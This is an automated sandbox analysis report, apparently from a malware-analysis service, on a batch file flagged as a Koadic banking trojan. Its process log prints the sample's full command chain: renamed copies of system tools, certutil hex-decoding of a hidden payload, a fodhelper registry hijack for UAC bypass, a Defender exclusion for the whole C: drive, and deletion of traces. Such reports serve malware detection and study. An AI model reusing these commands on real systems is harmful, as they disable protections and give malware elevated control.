        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080038209_2_00007FF608003820
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F718309_2_00007FF607F71830
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE184C9_2_00007FF607FE184C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FED8589_2_00007FF607FED858
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080238749_2_00007FF608023874
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB78909_2_00007FF607FB7890
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA58CC9_2_00007FF607FA58CC
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39166419_2_00007FF73A391664
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39596C19_2_00007FF73A39596C
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39605419_2_00007FF73A396054
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39767019_2_00007FF73A397670
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A392D7019_2_00007FF73A392D70
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A399C7419_2_00007FF73A399C74
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A397C7C19_2_00007FF73A397C7C
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39989019_2_00007FF73A399890
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39431819_2_00007FF73A394318
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39512819_2_00007FF73A395128
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39405019_2_00007FF73A394050
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A3983D819_2_00007FF73A3983D8
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A396AE819_2_00007FF73A396AE8
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A3967A019_2_00007FF73A3967A0
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A3972C019_2_00007FF73A3972C0
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A396EC819_2_00007FF73A396EC8
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D21EF022_2_00007FF739D21EF0
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2511422_2_00007FF739D25114
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D230B022_2_00007FF739D230B0
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2567C22_2_00007FF739D2567C
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D25B8C22_2_00007FF739D25B8C
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2135822_2_00007FF739D21358
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D23D6022_2_00007FF739D23D60
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D27D5022_2_00007FF739D27D50
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2792822_2_00007FF739D27928
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029420C431_2_029420C4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0AA5435_2_00007FF744F0AA54
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1555435_2_00007FF744F15554
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F08DF835_2_00007FF744F08DF8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0341035_2_00007FF744F03410
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1785435_2_00007FF744F17854
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F137D835_2_00007FF744F137D8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1422435_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F2AA3035_2_00007FF744F2AA30
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0D25035_2_00007FF744F0D250
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F09E5035_2_00007FF744F09E50
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F10A6C35_2_00007FF744F10A6C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0E68035_2_00007FF744F0E680
        Source: rPO767575.cmd, type: SAMPLE | Matched rule: MALWARE_BAT_KoadicBAT, author = ditekSHen, description = Koadic post-exploitation framework BAT payload
        Source: classification engine | Classification label: mal100.bank.troj.expl.evad.winCMD@65/25@6/1
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F032B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF60803826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
        Source: C:\Users\Public\ger.exe | Code function: 19_2_00007FF73A393F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle
        Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF744F2FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F989B0 VariantInit,#357,#358,#359,CoCreateInstance,SysAllocString,VariantClear,VariantClear,VariantClear,#357,VariantClear,SysFreeString
        Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608016320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError
        Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
        Source: C:\Users\Public\xkn.exe | Mutant created: NULL
        Source: C:\Users\Public\xkn.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suyjvk0i.1uq.ps1
        Source: C:\Users\Public\Libraries\Ping_c.pif | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
        Source: C:\Windows\System32\extrac32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: rPO767575.cmd | ReversingLabs: Detection: 50%
        Source: rPO767575.cmd | Virustotal: Detection: 43%
        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" "
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
        Source: unknown | Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Libraries\Ping_c.pif C:\Users\Public\Libraries\Ping_c.pif
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: atl.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\xkn.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\xkn.exe | Section loaded: amsi.dll
Source: C:\Users\Public\xkn.exe | Section loaded: userenv.dll
Source: C:\Users\Public\xkn.exe | Section loaded: profapi.dll
Source: C:\Users\Public\xkn.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\xkn.exe | Section loaded: wldp.dll
Source: C:\Users\Public\xkn.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\xkn.exe | Section loaded: gpapi.dll
Source: C:\Users\Public\xkn.exe | Section loaded: msisip.dll
Source: C:\Users\Public\xkn.exe | Section loaded: wshext.dll
Source: C:\Users\Public\xkn.exe | Section loaded: appxsip.dll
Source: C:\Users\Public\xkn.exe | Section loaded: opcservices.dll
Source: C:\Users\Public\xkn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\xkn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\xkn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Windows \System32\per.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows \System32\per.exe | Section loaded: uxtheme.dll
Source: C:\Windows \System32\per.exe | Section loaded: windows.storage.dll
Source: C:\Windows \System32\per.exe | Section loaded: wldp.dll
Source: C:\Windows \System32\per.exe | Section loaded: propsys.dll
Source: C:\Windows \System32\per.exe | Section loaded: urlmon.dll
Source: C:\Windows \System32\per.exe | Section loaded: iertutil.dll
Source: C:\Windows \System32\per.exe | Section loaded: srvcli.dll
Source: C:\Windows \System32\per.exe | Section loaded: netutils.dll
Source: C:\Windows \System32\per.exe | Section loaded: ieframe.dll
Source: C:\Windows \System32\per.exe | Section loaded: netapi32.dll
Source: C:\Windows \System32\per.exe | Section loaded: version.dll
Source: C:\Windows \System32\per.exe | Section loaded: userenv.dll
Source: C:\Windows \System32\per.exe | Section loaded: winhttp.dll
Source: C:\Windows \System32\per.exe | Section loaded: wkscli.dll
Source: C:\Windows \System32\per.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows \System32\per.exe | Section loaded: edputil.dll
Source: C:\Windows \System32\per.exe | Section loaded: secur32.dll
Source: C:\Windows \System32\per.exe | Section loaded: sspicli.dll
Source: C:\Windows \System32\per.exe | Section loaded: mlang.dll
Source: C:\Windows \System32\per.exe | Section loaded: wininet.dll
Source: C:\Windows \System32\per.exe | Section loaded: profapi.dll
Source: C:\Windows \System32\per.exe | Section loaded: policymanager.dll
Source: C:\Windows \System32\per.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows \System32\per.exe | Section loaded: twinui.appcore.dll
Source: C:\Windows \System32\per.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows \System32\per.exe | Section loaded: wintypes.dll
Source: C:\Windows \System32\per.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows \System32\per.exe | Section loaded: mrmcorer.dll
Source: C:\Windows \System32\per.exe | Section loaded: windows.staterepositorycore.dll
Source: C:\Windows \System32\per.exe | Section loaded: windows.ui.dll
Source: C:\Windows \System32\per.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows \System32\per.exe | Section loaded: textinputframework.dll
Source: C:\Windows \System32\per.exe | Section loaded: inputhost.dll
Source: C:\Windows \System32\per.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows \System32\per.exe | Section loaded: coremessaging.dll
Source: C:\Windows \System32\per.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows \System32\per.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows \System32\per.exe | Section loaded: coremessaging.dll (2 consecutive loads)
Source: C:\Windows \System32\per.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows \System32\per.exe | Section loaded: ntmarta.dll
Source: C:\Windows \System32\per.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe | Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: version.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: archiveint.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: url.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: amsi.dll (6 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: amsi.dll (4 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: amsi.dll (81 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (6 consecutive loads; DLL names shown with '?' were not rendered by the report)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ???y.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ????.dll (3 consecutive loads)
Source: C:\Users\Public\Libraries\Ping_c.pif | Section loaded: ??.dll (2 consecutive loads)
